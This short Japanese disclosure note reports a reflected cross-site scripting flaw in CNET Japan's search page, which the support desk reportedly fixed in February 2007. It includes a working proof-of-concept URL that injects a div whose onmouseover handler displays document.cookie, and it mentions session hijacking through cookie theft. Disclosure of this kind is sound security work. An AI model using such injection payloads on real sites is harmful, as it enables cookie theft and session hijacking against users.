CNET Japan — 検索の XSS

検索結果に <div onmouseover="alert(document.cookie)"> を注入。画面上に置いた黒い正方形にマウスを乗せると cookie が表示される、という実証(Safari/Firefox で確認)。同ドメインでログイン情報を扱っていたため、cookie 窃取によるセッション乗っ取りの恐れも指摘した。

サポートデスクへ報告した 2 日後(2007-02-05)に「調査し、修正いたしました」と返信があり、こちらからも礼を返した。

http://japan.cnet.com/search/search.htm?q=</span><div onmouseover="alert(document.cookie);" style="width:300px;height:300px;background-color:black;"/><span>